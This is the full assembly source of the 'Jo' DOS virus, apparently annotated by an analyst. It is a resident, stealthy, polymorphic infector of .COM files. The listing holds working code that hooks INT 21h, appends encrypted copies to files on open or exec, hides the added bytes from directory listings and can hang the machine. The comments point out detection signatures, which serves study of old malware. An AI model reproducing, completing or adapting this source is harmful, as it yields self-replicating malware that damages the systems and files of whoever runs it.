; MASM listing directives: module name, listing page geometry, listing title.
NAME Jo
PAGE 55,132
TITLE Jo Virus.
;
; This is Yet another virus from the ARCV, this one is called
; Joanna, it was written by Apache Warrior, ARCV President.
;
; It has Stealth features, it is a Resident infector of .COM files
; and uses the Cybertech Mutation Engine (TM) by Apache Warrior for
; its Polymorphic features. There is a maximum of 3 unchanged bytes
; in the Encrypted code.
;
; Tiny-model .COM image: a single segment, CS=DS=ES at load time.
.model tiny

code segment

ASSUME CS:CODE,DS:CODE,ES:CODE

; Interrupt-vector-table slot for INT 21h (21h*4 = 0084h): offset word at
; 0000:0084h, segment word at 0000:0086h. The residency code (tt2) writes
; these two words directly rather than going through INT 21h/25h, so an
; installed copy shows up as an INT 21h vector pointing into the segment it
; carves off the top of conventional memory.
int_21ofs equ 84h
int_21seg equ 86h
; Bytes written to an infected file: everything from main up to the first
; working-storage variable (handle). `len` below is the same quantity.
length equ offset handle-offset main
msglen equ offset oldstart-offset msg ; not referenced elsewhere in this listing
tsrlen equ (offset findat-offset main)/10 ; not referenced elsewhere in this listing
len equ offset handle-offset main
; Number of 16-bit words from main2 up to `string`: this is the span that
; mut_eng encrypts. The decryptor (main..main2) is stored in clear text.
virlen equ (offset string-offset main2)/2
decryptlen equ offset main2-offset main

org 100h

; Entry of the dropper image. In an infected host the first three bytes are
; replaced by jpover (E9 rel16) pointing at the appended copy, and the host's
; original five bytes are kept in oldstart and put back by main3.
start: jmp main
db 0,0,0
; Decryptor. The hand-assembled bytes at loop_1 (2E 81 2C + the word at
; `switch`) encode SUB word ptr cs:[si],imm16. mut_eng patches main+1 (the
; SI start), `switch` (the key) and toggles loop_1+2 between 2Ch (SUB) and
; 04h (ADD) on every infection, so only this short loop is stable across
; samples; the key is the time-of-day word returned by INT 21h/2Ch.
main: mov si,offset main2 ; SI = first encrypted word (patched by mut_eng)
mov cx,virlen ; number of 16-bit words to decrypt
loop_1:
db 2eh,81h,2ch ; SUB/ADD word ptr cs:[si],imm16 (opcode bytes; op toggled per infection)
switch: dw 0 ; 16-bit key, filled in by mut_eng
add si,02h
dec cx
jnz loop_1
; First instruction of the encrypted span. The call/pop pair yields the
; runtime offset of findoff; subtracting the assembled offset leaves the
; relocation delta in SI, which every data reference uses until residency.
main2: call findoff ; find file offset
findoff: pop si ; SI = runtime offset of findoff
sub si,offset findoff ; SI = delta between loaded and assembled offsets
push ds ; both restored by oldprog before returning to the host
push es
push cs
pop ds
push cs
pop es
; Cross-check with another ARCV program: INT 13h AX=0FF05h is used as an
; install check and, if AH comes back as 0E9h, msg2 is printed and the
; machine is hung in a tight loop. A DOS session that freezes right after
; starting a .COM is the visible symptom of this branch.
mov ax,0ff05h ; Test for Scythe2 Boot
int 13h
cmp ah,0e9h ; Check for Scythe2 Boot
jnz haha ; not present: continue
mov ah,09h ; Display message
lea dx,[si+offset msg2]
int 21h
jmp $ ; hang the machine (infinite loop)
; Date trigger: INT 21h/2Ah returns CX=year, DH=month, DL=day. DX is
; compared with the constant 1210h and msg is printed only on a match;
; the original comment describes the intended month as October.
haha: mov ah,2ah ; Date Test
int 21h ;
cmp dx,1210h ; Is month the Oct.
jnz main3 ; no match: continue
mov ah,09h ; Display Message
lea dx,[si+offset msg]
int 21h
; Put the host's first five bytes (kept in oldstart) back at CS:0100h, then
; ask a possibly resident copy whether it is already installed.
main3: mov di,0100h ; destination: the host entry point
push si ; keep the relocation delta across the copy
mov ax,offset oldstart ;
add si,ax ; SI = runtime address of oldstart
mov cx,05h ; five bytes were saved at infection time
cld ;
repz movsb ; (repz on movsb behaves as a plain rep)

; Install check: AX=0FFA4h into INT 21h; the resident handler (sayitis)
; replies AX=42A1h. This request/response pair is a usable signature for
; detecting the resident copy from a clean program.
inst: mov ax,0ffa4h ; check to see if already installed
int 21h
pop si ; bring back si
cmp ax,42a1h
je oldprog ; already resident: just run the host
; Residency. The program's own memory block is shrunk by 0BCh paragraphs
; (via its MCB size field and the PSP top-of-memory word), the virus image
; is copied into the paragraphs cut off at the top, and the INT 21h vector
; is pointed at new21 there. No TSR service is called: the program returns
; to the host normally and the copy survives because the paragraphs above
; the shrunk last block are no longer covered by the MCB chain.
tt2: xor ax,ax ; Residency Routine
push ax
mov ax,ds ; DS = PSP segment; the MCB is the paragraph before it
dec ax ;
mov es,ax ; ES = MCB segment
pop ds ; DS = 0000h (interrupt vector table)
mov ax,word ptr ds:int_21ofs ; read the current INT 21h vector
mov cx,word ptr ds:int_21seg ;
mov word ptr cs:[si+int21],ax ; keep it for chaining (int21 storage)
mov word ptr cs:[si+int21+2],cx ;
cmp byte ptr es:[0],5ah ; 'Z': this MCB must be the last block in the chain
jne oldprog ; otherwise give up silently
mov ax,es:[3] ; MCB size in paragraphs
sub ax,0bch ; reserve 0BCh paragraphs (3,008 bytes) for the virus
jb oldprog ; block too small: give up
mov es:[3],ax ; shrink the block
sub word ptr es:[12h],0bch ; MCB+12h = PSP:0002h (top-of-memory word, PSP follows the MCB); lower it too
mov es,es:[12h] ; ES = new top-of-memory segment = home of the resident copy
push ds ;
push cs ;
pop ds ; copy the image so that assembled offsets are valid at ES:0100h
mov di,0100h ;
mov cx,len+5 ;
push si ;
add si,0100h ; source = runtime image of the assembled 0100h
rep movsb ;
pop si
pop ds ; DS = 0000h again
cli ; the two-word vector write must not be interrupted
mov ax,offset new21 ; Load New Int 21h handler
mov word ptr ds:int_21ofs,ax ; address and store
mov word ptr ds:int_21seg,es ;
sti ;
; Return to the host: restores the ES/DS pushed at findoff and "returns" to
; CS:0100h, where main3 put the original five bytes back.
oldprog:
mov di,0100h ; Return to Original
pop es ; Program..
pop ds ;
push di ;
ret ; pops 0100h as the return address

int21 dd 0h ; original INT 21h far address, chained by new21 and i21
;
; New interrupt 21h Handler
;
; Install-check reply: AX=42A1h is returned for the request AX=0FFA4h.
sayitis: mov ax,42a1h ; Install Check..
iret

; Resident INT 21h handler. Directory searches (FCB 11h/12h, handle 4Eh/4Fh)
; are routed through the stealth code in adjust_FCB; file open (3Dh) and
; exec (4Bh) run an infection attempt on the named file (checkit) and are
; then passed to the original handler. Every other function is chained
; straight through with registers and flags untouched.
new21: ;nop ; Sign byte
cmp ax,0ffa4h ; Installation Check
je sayitis
cmp ah,11h ; FCB Search file
je adjust_FCB
cmp ah,12h ; FCB Search Again
je adjust_FCB
cmp ah,4eh ; Handle Search file
je adjust_FCB
cmp ah,4fh ; Handle Search Again
je adjust_FCB
cmp ah,3dh ; open file (DS:DX = name)
je intgo ; yes: attempt infection first
cmp ah,4bh ; exec (DS:DX = name)
jne noint ; anything else: pass through
intgo: push ax ; 4bh, 3dh Infect file
push bx ; preserve the caller's registers around checkit
push cx
push es
push si
push di
push dx
push ds
call checkit ; Call infect routine
pop ds
pop dx
pop di
pop si
pop es
pop cx
pop bx
pop ax
noint: jmp cs:[int21] ; chain to the original INT 21h handler
; Stealth wrapper for directory searches. SI=1 marks a handle search (AH has
; bit 6 set for 4Eh/4Fh), SI=0 an FCB search. ES:BX is set to the DTA, the
; real call is made through i21, `adjust` then rewrites the returned entry,
; and `retf 2` returns to the caller with the flags produced by the real
; call (the caller's pushed flags are discarded).
adjust_FCB: push es ; Stealth Routine
push bx
push si
push ax
xor si,si
and ah,40h ; Check for handle Search
jz okFCB
mov si,1 ; Set flag
okFCB: mov ah,2fh ; Get DTA address into ES:BX
int 21h
pop ax ; Restore ax to original function
call i21 ; value call it
pushf ; save flags
push ax ; save ax error code
call adjust ; Call stealth adjust routine
pop ax ; restore registers
popf
pop si
pop bx
pop es
retf 2 ; Return to caller
; Hides the appended bytes in directory listings. An infected file is
; recognised by the "stealth stamp": bits 1, 3 and 4 (mask 1Ah) set in the
; low byte of its time field (applied by `or cx,1ah` in checkit). For such
; entries `len` is subtracted from the low word of the reported size. Only
; the mask bits are tested, so a clean file whose seconds field happens to
; carry those bits is under-reported as well. The stamp is a cheap on-disk
; indicator: it survives in the file's timestamp even after disinfection.
adjust: pushf ; Stealth check routine
cmp si,0 ; Check flag set earlier
je fcb1
popf
jc repurn ; search failed: nothing to adjust
mov ah,byte ptr es:[bx+16h] ; DTA+16h: file time, low byte
and ah,01ah ; Check stealth stamp
cmp ah,01ah ;
jne repurn ;
sub word ptr es:[bx+1ah],len ; DTA+1Ah: file size, low word; hide the appended bytes
repurn: ret ; from file size.
fcb1: popf ; Same again but for the FCB
cmp al,0ffh ; AL=0FFh: FCB search failed
je meat_hook
cmp byte ptr es:[bx],0ffh ; extended FCB: skip the 7-byte prefix
jne xx2
add bx,7
xx2: mov ah,byte ptr es:[bx+17h] ; time field (directory entry after the drive byte)
and ah,01ah
cmp ah,01ah
jne meat_hook
sub word ptr es:[bx+1dh],len ; size field, low word
meat_hook: ret
com_txt db 'COM',0 ; extension compared in checkit

; INT 21h/43h helpers with fall-through entry points:
;   reset    - CX=20h, AL=01h: set attributes to archive-only (clears R/H/S)
;   set_back - CX preloaded, AL=01h: restore the saved attributes
;   find_att - AL preloaded (00h = get attributes)
;   i21      - simulate INT 21h through the saved original vector, bypassing new21
reset: ; File Attrib routines
mov cx,20h
set_back:
mov al,01h
find_att:
mov ah,43h ; Alter file attributes
i21: pushf
call cs:[int21]
exitsub: ret
; Infection routine, entered from new21 with DS:DX = filename of the open or
; exec target. Sequence: the extension must be "COM" and the name must not
; end in "ND" (COMMAND.COM is skipped); attributes are saved and cleared; the
; file is opened read/write; its time/date are saved with the stealth stamp
; applied to the time; the first 5 bytes are kept in oldstart; files whose
; end-relative position is 0EA60h or more, or that already end in the 5-byte
; ID string, are left alone; otherwise mut_eng builds a freshly keyed copy
; that is appended and the first 3 bytes are overwritten with a jump to it;
; finally time/date and attributes are restored. Note the two near-identical
; labels exitsub (in the helper block above, a bare ret) and exit_sub
; (below, which restores attributes): the early exits use the former.
checkit: ; Infect routine
push es ; Save some more registers
push ds
push ds ; ES:DI = DS:DX = filename
pop es ;
push dx ;
pop di ;
mov cx,0ffh ; scan up to 255 bytes for '.'
mov al,'.' ;
repnz scasb ;
push cs ;
pop ds ;
mov si,offset com_txt ; Compare with COM extension
mov cx,3 ;
rep cmpsb ;
pop ds ; Restore Reg...
pop es ;
jnz exitsub ; not a .COM: return

foundtype: sub di,06h ; DI -> last two characters before the '.'
cmp ds:[di],'DN' ; "ND" in memory order: skip COMMAND.COM
je exitsub ;
mov word ptr cs:[nameptr],dx ; Save DS:DX pointer for later
mov word ptr cs:[nameptr+2],ds ;
mov al,00h ; get attributes (INT 21h/4300h)
call find_att ;
jc exitsub ; Error Quit.

alteratr: mov cs:[attrib],cx ; Save them
call reset ; set attributes to 20h so a read-only/hidden file can be written

mov ax,3d02h ; Open file read/write
call i21
jc exitsub ; Error Quit
push cs ; Set DS to CS
pop ds ;
mov ds:[handle],ax ; Store handle

mov ax,5700h ; Read file time and date
mov bx,ds:[handle] ;
call i21 ;
ke9: mov ds:[date],dx ; Save DX
or cx,1ah ; stealth stamp: set bits 1,3,4 of the time's low byte (see adjust)
mov ds:[time],cx ; Save CX

mov ah,3fh ; Read the host's first 5 bytes
mov cx,05h ; into oldstart (written out as part of the body)
mov dx,offset oldstart ;
call i21 ;
closeit: jc close2 ; Error Quit

mov ax,4202h ; seek relative to end of file
mov cx,0ffffh ; offset -5 (CX:DX = 0FFFFh:0FFFBh)
mov dx,0fffbh ;
call i21 ;
jc close ; Error Quit

mov word ptr cs:si_val,ax ; AX = low word of (size-5); used by mut_eng and for the jump below
cmp ax,0ea60h ; size limit
jae close ; Yes then Quit

mov ah,3fh ; Read in last 5 bytes
mov cx,05h ;
mov dx,offset tempmem ;
call i21 ;
jc close ; Error

push cs ; Reset ES to CS
pop es ;
mov di,offset tempmem ; already infected if the file ends in the ID string
mov si,offset string ;
mov cx,5 ;
rep cmpsb ;
jz close ; Yes the Close and Quit

zapfile: ; No Infect and Be Damned
mov ax,word ptr cs:si_val ;
add ax,2 ; displacement for the E9 at offset 0: target = original end of file
push cs ;
pop ds ;
mov word ptr ds:[jpover+1],ax ; Setup new jump
call mut_eng ; returns DS:DX = encrypted copy + ID string
mov ah,40h ; append it (file pointer is at EOF after the last read)
mov bx,cs:[handle] ; Load Handle
mov cx,length ; LENGTH OF PROGRAM****
call i21 ; Write away
close2: jc close ; Quit if error

push cs ; Reset DS to CS
pop ds ;
mov ax,4200h ; Move File pointer to start
xor cx,cx ; of file
cwd ; DX = 0 (AX is positive here)
call i21 ;
jc close ; Error Quit..

mov ah,40h ; overwrite the first 3 bytes with the jump
mov cx,03h ;
mov dx,offset jpover ;
call i21 ;

close: mov ax,5701h ; Restore Time and Date (CX carries the stamp)
mov bx,ds:[handle] ;
mov cx,ds:[time] ;
mov dx,ds:[date] ;
call i21 ;
mov ah,3eh ; Close file
call i21 ;
exit_sub: mov dx,word ptr [nameptr] ; Reset Attributes to as they were
mov cx,ds:[attrib] ;
mov ds,word ptr cs:[nameptr+2] ;
call set_back ;
ret ; Return to INT 21h Handler
;
; CyberTech Mutation Engine
;
; This is Version Two of the Mutation Engine
; Unlike others it is very much Virus Specific.. Works
; Best on Resident Viruses..
;
; To Call
;
; si_val = File Size
;
; Returns
; DS:DX = Encrypted Virus Code, Use DS:DX pointer to
; Write From..
; Builds the copy that checkit writes to the file. The key is DX from
; INT 21h/2Ch (seconds:hundredths), so infections in the same hundredth of a
; second share a key. Each call also flips the ADD/SUB opcode of both the
; decryptor (loop_1+2) and the encryptor (switch2) with XOR 28h, and patches
; main+1 with si_val + offset main2 so the new decryptor starts at the
; appended body. The work area is the 0BCh paragraphs just below CS, which
; presumably is the top of the shrunk host block (see tt2) — confirm; host
; memory there is overwritten on every infection.
; Output: DS:DX -> [clear decryptor][encrypted body][5-byte ID string].
mut_eng:
mov ah,2ch ; Get Time
call i21 ;
mov word ptr ds:[switch],dx ; key into the decryptor's immediate
mov word ptr ds:[switch2+1],dx ; and into the encryptor's immediate
mov ax,cs:[si_val] ; Get file size
mov dx,offset main2 ;
add ax,dx ;
mov word ptr [main+1],ax ; decryptor's SI start for the new host
xor byte ptr [loop_1+2],28h ; modrm 2Ch<->04h: SUB<->ADD in the decryptor
xor byte ptr switch2,28h ; opcode 05h<->2Dh: ADD<->SUB in the encryptor
push cs ; Reset Segment Regs.
pop ds ;
push cs ;
pop ax ; work segment = CS - 0BCh
sub ax,0bch ; and put in es
mov es,ax ;
mov si,offset main ; copy the clear-text decryptor (decryptlen bytes)
mov di,0100h ;
mov cx,decryptlen ;
rep movsb ;
mov si,offset main2 ; encrypt virlen words into ES:DI, one word at a time
mov cx,virlen ;
loop_10: lodsw ;
switch2: add ax,0000 ; immediate patched above; opcode toggled per infection
stosw ;
loop loop_10 ;
mov si,offset string ; append the 5-byte ID string in clear text
mov cx,5 ; new code
rep movsb ;
mov dx,0100h ; DS:DX = encrypted image for the write in checkit
push es ; Location
pop ds ;
ret ; Return
; Data Section, contains Messages etc.

; Little message to the Wife to Be..
; Messages ('$'-terminated, printed with INT 21h/09h) and identifying text.
; Everything from here down to `string` lies inside the encrypted span
; (main2..string), so none of it is visible in clear text in an infected file.
msg db 'Looking Good Slimline Joanna.',0dh,0ah
db 'Made in England by Apache Warrior, ARCV Pres.',0dh,0ah,0ah
db 'Jo Ver. 1.11 (c) Apache Warrior 92.',0dh,0ah
db '$'

msg2 db 'I Love You Joanna, Apache..',0dh,0ah,'$'

virus_name db '[JO]',00h, ; Virus Name..
author db 'By Apache Warrior, ARCV Pres.' ; Thats me..
filler dd 0h

; Five bytes of the host's original entry (default: terminate with AL=0 for
; the dropper itself); checkit overwrites them with the real first five
; bytes of each new host before the body is written out.
oldstart: mov ax,4c00h ; Original program start
int 21h
nop
nop

j100h dd 0100h ; not referenced elsewhere in this listing
jpover db 0e9h,00,00h ; 3-byte jump written over the host's first bytes; displacement patched in checkit

string db '65fd3' ; 5-byte ID string; mut_eng appends it in clear text, so it is the last 5 bytes of an infected file

heap: ; Working storage beyond `length`: not written to the file
handle dw 0h ; open handle of the file being infected
nameptr dd 0h ; far pointer to the filename (DS:DX at the hook)
attrib dw 0h ; original attributes
date dw 0h ; original date
time dw 0h ; original time with the stealth stamp applied
tempmem db 10h dup (?) ; last 5 bytes of the candidate file
findat db 0h ; only referenced by the unused tsrlen equate
si_val dw 0h ; low word of (file size - 5) from the end-relative seek

code ends

end start